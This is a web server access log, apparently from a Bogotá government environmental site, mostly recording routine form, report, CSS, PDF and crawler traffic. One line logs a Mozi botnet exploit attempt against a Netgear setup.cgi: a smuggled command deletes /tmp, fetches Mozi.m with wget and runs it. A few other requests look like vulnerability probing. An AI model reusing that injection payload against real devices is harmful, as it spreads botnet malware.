200.118.64.109 - - [14/Mar/2022:20:44:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:20:44:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:44:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:44:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:44:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:44:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 127
200.118.64.109 - - [14/Mar/2022:20:44:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:20:44:09 -0500] "GET /reports/rwservlet/getjobid72766?server=repnomi HTTP/1.1" 200 47864
200.118.64.109 - - [14/Mar/2022:20:44:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:20:44:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:44:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:44:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 112
200.118.64.109 - - [14/Mar/2022:20:44:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:20:44:48 -0500] "GET /reports/rwservlet/getjobid72767?server=repnomi HTTP/1.1" 200 48124
191.156.190.24 - - [14/Mar/2022:20:44:56 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.64.109 - - [14/Mar/2022:20:45:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:20:45:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:45:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [14/Mar/2022:20:45:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 109
200.118.64.109 - - [14/Mar/2022:20:45:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:20:45:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:20:45:41 -0500] "GET /reports/rwservlet/getjobid72768?server=repnomi HTTP/1.1" 200 612082
200.118.64.109 - - [14/Mar/2022:20:46:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2027
200.118.64.109 - - [14/Mar/2022:20:46:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 78
27.47.1.127 - - [14/Mar/2022:20:46:37 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
191.156.53.128 - - [14/Mar/2022:20:47:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.64.109 - - [14/Mar/2022:20:47:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:20:48:23 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [14/Mar/2022:20:49:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.80.52.15 - - [14/Mar/2022:20:50:09 -0500] "GET /ciudad-bolivar-y-puente-aranda-se-alistan-para-una-nueva-llantaton.html?fbclid=IwAR0ZD0PgZRye1YxSQmsFYWWigF5Ta-D0D4FhHK70tVuovqJ0iy2PWJ8oKR4 HTTP/1.1" 200 991
207.241.232.241 - - [14/Mar/2022:20:51:08 -0500] "-" 408 -
200.118.64.109 - - [14/Mar/2022:20:51:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
190.159.247.40 - - [14/Mar/2022:20:51:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [14/Mar/2022:20:51:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117374
45.133.172.116 - - [14/Mar/2022:20:53:42 -0500] "GET / HTTP/1.1" 200 319
200.118.64.109 - - [14/Mar/2022:20:53:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.102.90.221 - - [14/Mar/2022:20:53:55 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18mKb1ICwxbMNmRtIWBjX9W6O0ooTofSQS2fqz1Wnfpyri21v1hBuVc&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 30
186.102.90.221 - - [14/Mar/2022:20:53:55 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/phAA16zrrTvKDdW1VvSwGekhejRdjrwSNjQ/VGfeQH7JSPiuXfulaYRiCkJK/2iV/ugemFRu9l/4wmCe67AuSVY1oSLFDeAw=&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 97
186.102.90.221 - - [14/Mar/2022:20:53:55 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19NiHZKdvXVxNxlUgPSNZ2ZMUp1Kvbu/KG15d3FvQXBeGWQQS1N9CbmlMPFiKd8bjB5Dc53QY9nLTlWZMBYgMI6eBmyheRcRqUWLY63GJQvsZYp5hCa35+qbyRLUbwRCfmbzfwLzHSfcmvSK+T1wIGs6lzOu8PwMvzvOlNrd8xiMZM7yODd/+RA1GlSNZEdnE8FJIEDaIFRNau2n2rw3R0siHePXRvq7//FnsuLEILIbEACShGoYIVS/794ZLMChzNBUCZCGcN+vg0lwG7VLfVDOdcLEBWUQt3wkuzEBnXp/K+xuja/mVkUl2uniNRk+MvxJR8xkWniMAqDUgDCyxQgFFAtkOoOQEJipp2dnSxzdJzPmA/QNWRHWfLLZN/ytWDI/7LtEut+kpKat1zhQkwdy1tFbK2ZgNk1pLsCZioLfw37D8/2wlTVXWkub39D95ONUhC+872KJzTRa7KixPdEAU/6zznGd8iYAN8reo5clU2AEsyXF5jgJHwQMLuFoxvglp6I1ULWazfYWiszFEyb0ykitsxx/vTUDvwj5z/rX3CWIhe9E/9bfJAW4Cr51UE51bN9nYAGsUizAZia9xB/f8g1ggOVE1bAt07uvS1SuIQRn0q7KE8zm2TfrJLPvk9aXwhAlI0GCi89wikG3AHr9ru5o+y9Dh6eFEVcLZqY3rkIrM4NNhsNgHFYEey7r/HRbVqLYGF+lCCi1yiIfh5nytVChlVY02cfVXJIiOGFnRGIS9GY35Q+Lns3st/j+N8VbNRKEQosZvOKfukxAdAkkzDRM9GAe3DE/FkZftV0oWODXDmpcWMp7IS/Zf6Qvsj0Jnc09sUipce3QzIhA0esM5Wr26SFmagJSC4bj6b3F4yDfWZ+qT0dbfA6zThaJ7V+n3+0PRMR8IxFvUHPEoWBg02YPUWLLgqfRR2DA4yfyrORZNaC9WiYGHXXE+vL8GNA6v24tnD8bjCyPsJNx1eb4Ch3vE9z+uu1dTvLd4q4kenKdFgBR/jVhxRoz75N4cyxF/a4ZEjqk2GeTvsa58PzoCsVh7kvG6V7JAhTDb5iLmonZWnk9lXKRjUeAAqIYk8BaKe15mRD6lRnLVdVcGMpTGZBmz059B0=&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 2259
186.102.90.221 - - [14/Mar/2022:20:53:55 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18h67fJm7JHwq1/ZjEeZRfGmVb4Xc++CQYop93FJVztBkwEMch4O+cg&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:55 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX197FeLre/A4SKMSY0a+SES/fIX6F9Ew2s9cgqbx94Gggy916K7OzGOh&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/ynzF+ZYeG68n1KcHPUOJhTkAgmKES9WqY3TcCtLNteULc0pXj10/G&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/TCG3ttS5bLw27vxvnhJDHQnUTgTGeY0QRv9rCuxLUtQaYxs8aF1m3&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+qZS/1NxNqKPGoxIiK/OGP7bjuajKEO8ndWTerz5g0MQjxzkwFkM7K&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/KDd6FChjXI7ZBa33KMIYBJj4hPowsBje9RhHdy6TqLpCuCkpublGv&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+QNt2rSR6kn/7MAgQriDMzJJA3UWfru9HTdb0OIAJ1hLs1/MPGr9ki&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/l9USLsTS3dghiNM2CVsJyfu78q3Gh8qbB4lfTPq6WKoFlO12VheWI&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 70
186.102.90.221 - - [14/Mar/2022:20:53:57 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+5qWUiYyoS8CnS5Y0/bY9bvIBcW4Pz7w7iCQo+nGGMIrXf1/IVKfj7BcyrgD3OpsluyHt3y+4GktMvSljjMfu4A7HlfLrf7sB5bXvMHUfWUEPLekV5K46R5CJoNQmaPoKS6q91tQIBPs7LtXJa/FhenkzZ4FLnC3Wbs9kDTJG37XG7pq/i2PGkY67+qlkgnYHsQx7P7VUb/ha0hgoBChb/HG0cZp9CpXSyHgc1HEgVG504pm8bEWik9geeuv5yrcmUb2SJaAZBD/GvhpVoKbbwZxojOdD3ZnfxhRBfqT1HhQwzInJK7nRZYBza1q5019FwBwTfV6HK89EvExqT4moSteL9n5KiuD4=&u=U2FsdGVkX19Q2ijEGMqBrRQTIPP4amaXm0nG+tHoqBoO/JNA88QCxRFS1jrNo6uk&y=U2FsdGVkX1879qI8G/zdUll691ctZYMvfBd1T3EjjakIAzwGOhwSOyuBWWpSrsP/ HTTP/1.1" 200 196
186.102.90.221 - - [14/Mar/2022:20:53:57 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18mKb1ICwxbMNmRtIWBjX9W6O0ooTofSQS2fqz1Wnfpyri21v1hBuVc HTTP/1.1" 200 30975
186.84.89.244 - - [14/Mar/2022:20:55:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
31.13.103.7 - - [14/Mar/2022:20:55:26 -0500] "GET /images/Acuerdos1.jpeg HTTP/1.1" 200 59889
157.55.39.87 - - [14/Mar/2022:20:55:35 -0500] "-" 408 -
191.95.134.107 - - [14/Mar/2022:20:55:36 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.64.109 - - [14/Mar/2022:20:55:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:20:56:02 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [14/Mar/2022:20:57:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.95 - - [14/Mar/2022:20:59:35 -0500] "GET /bla/resoluciones/autos%202014/3854.pdf HTTP/1.1" 200 491416
200.118.64.109 - - [14/Mar/2022:20:59:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
102.129.152.244 - - [14/Mar/2022:20:59:49 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Mar/2022:21:01:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.68.49 - - [14/Mar/2022:21:01:09 -0500] "-" 408 -
200.118.64.109 - - [14/Mar/2022:21:01:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [14/Mar/2022:21:01:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117374
45.133.172.116 - - [14/Mar/2022:21:02:51 -0500] "GET / HTTP/1.1" 200 319
200.118.64.109 - - [14/Mar/2022:21:03:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.95 - - [14/Mar/2022:21:03:56 -0500] "GET /bla/resoluciones/autos%202014/4241.pdf HTTP/1.1" 200 522708
207.46.13.95 - - [14/Mar/2022:21:05:07 -0500] "GET /bla/resoluciones/autos%202019/5498.pdf HTTP/1.1" 200 281334
200.118.64.109 - - [14/Mar/2022:21:05:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:21:06:01 -0500] "HEAD / HTTP/1.1" 200 -
191.89.17.15 - - [14/Mar/2022:21:06:09 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.61.204.184 - - [14/Mar/2022:21:06:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.241.232.241 - - [14/Mar/2022:21:06:27 -0500] "-" 408 -
190.145.207.68 - - [14/Mar/2022:21:07:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339066
200.118.64.109 - - [14/Mar/2022:21:07:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.26 - - [14/Mar/2022:21:08:27 -0500] "GET /bla/resoluciones/autos%202019/4614.pdf HTTP/1.1" 200 341810
66.249.73.127 - - [14/Mar/2022:21:08:49 -0500] "-" 408 -
200.118.64.109 - - [14/Mar/2022:21:09:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.81.110.210 - - [14/Mar/2022:21:10:52 -0500] "GET /secretaria-de-ambiente-abre-ciclo-de-capacitaciones-sobre-techos-verdes-y-jardines-verticales.html?fbclid=IwAR3cp897BiiJ7UdOqebZt9xx-kD4kECUKQKv_v4sV_vn0NjgJhd8vifO220 HTTP/1.1" 200 1078
216.245.221.92 - - [14/Mar/2022:21:11:01 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [14/Mar/2022:21:11:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [14/Mar/2022:21:11:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117374
199.59.150.180 - - [14/Mar/2022:21:12:40 -0500] "-" 408 -
200.118.64.109 - - [14/Mar/2022:21:13:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
181.61.205.73 - - [14/Mar/2022:21:14:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.64.109 - - [14/Mar/2022:21:15:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:21:16:01 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [14/Mar/2022:21:17:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [14/Mar/2022:21:19:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:21:21:01 -0500] "HEAD / HTTP/1.1" 200 -
186.31.217.48 - - [14/Mar/2022:21:21:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
207.241.232.241 - - [14/Mar/2022:21:21:30 -0500] "-" 408 -
201.245.192.253 - - [14/Mar/2022:21:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45927
200.118.64.109 - - [14/Mar/2022:21:21:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [14/Mar/2022:21:21:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46417
201.245.192.253 - - [14/Mar/2022:21:21:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117374
200.118.64.109 - - [14/Mar/2022:21:23:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
34.90.189.164 - - [14/Mar/2022:21:23:47 -0500] "GET / HTTP/1.1" 200 319
179.33.77.200 - - [14/Mar/2022:21:24:11 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.64.109 - - [14/Mar/2022:21:25:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:21:26:01 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [14/Mar/2022:21:27:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.73.100 - - [14/Mar/2022:21:28:04 -0500] "-" 408 -
201.185.147.85 - - [14/Mar/2022:21:28:17 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
201.185.147.85 - - [14/Mar/2022:21:28:16 -0500] "GET /portaldeninos/ HTTP/1.1" 200 154220
201.185.147.85 - - [14/Mar/2022:21:28:17 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
201.185.147.85 - - [14/Mar/2022:21:28:17 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
181.52.223.75 - - [14/Mar/2022:21:28:57 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.52.223.75 - - [14/Mar/2022:21:28:59 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.52.223.75 - - [14/Mar/2022:21:28:59 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.52.223.75 - - [14/Mar/2022:21:28:59 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.52.223.75 - - [14/Mar/2022:21:28:59 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.52.223.75 - - [14/Mar/2022:21:29:01 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
45.137.21.141 - - [14/Mar/2022:21:29:19 -0500] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 200 1870
45.137.21.141 - - [14/Mar/2022:21:29:29 -0500] "PUT /SDK/webLanguage HTTP/1.1" 405 938
45.137.21.141 - - [14/Mar/2022:21:29:40 -0500] "GET /dehrfggfd HTTP/1.1" 404 1018
200.118.64.109 - - [14/Mar/2022:21:29:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:21:31:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Mar/2022:21:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45927
200.118.64.109 - - [14/Mar/2022:21:31:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [14/Mar/2022:21:31:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46417
186.80.52.89 - - [14/Mar/2022:21:32:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.64.109 - - [14/Mar/2022:21:33:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.73.127 - - [14/Mar/2022:21:34:06 -0500] "-" 408 -
201.245.192.253 - - [14/Mar/2022:21:33:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117374
173.252.107.5 - - [14/Mar/2022:21:35:32 -0500] "GET /mas-de-570-llantas-fueron-recolectadas-en-la-llantaton-de-bosa.html HTTP/1.1" 206 907
200.118.64.109 - - [14/Mar/2022:21:35:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d64dc8fa880ef04420a34799b681b23a19.e3iSbxaKaheRe3qTch0LbxeTa41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [14/Mar/2022:21:36:01 -0500] "HEAD / HTTP/1.1" 200 -
186.80.52.5 - - [14/Mar/2022:21:36:26 -0500] "-" 408 -
207.241.232.241 - - [14/Mar/2022:21:36:32 -0500] "-" 408 -
